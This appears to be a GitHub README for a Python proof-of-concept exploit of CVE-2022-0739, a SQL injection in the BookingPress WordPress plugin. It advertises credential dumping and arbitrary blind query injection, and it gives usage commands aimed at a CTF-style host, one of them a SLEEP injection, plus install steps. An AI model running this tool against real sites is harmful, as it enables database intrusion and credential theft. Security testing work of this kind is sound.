/CVE-2022-0739

🐍 Python Exploit for CVE-2022-0739

Primary LanguagePythonMIT LicenseMIT

CVE-2022-0739

Python PoC Exploit for CVE-2022-0739

Features

  • Database Metadata Lookup
  • Wordpress User Credential Dump
  • Arbitrary Blind Query Injection 💉

Usage

usage: cve-2022-0739 [-h] -u URL [-e EXEC]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the page containing the BookingPress Widget
  -e EXEC, --exec EXEC  Optional query for Blind SQL Injection

Information Leak

cve-2022-0739 --url http://metapress.htb/event

Blind Injection

cve-2022-0739 --url http://metapress.htb/event --exec "SELECT SLEEP(5)"

Installation

PyPI

python3 -m pip install cve-2022-0739

Manual

python3 -m pip install cve_2022_0739-1.0.0-py3-none-any.whl

Download Latest Release

Demo

Information Leak

demo

Blind Injection

demo-exec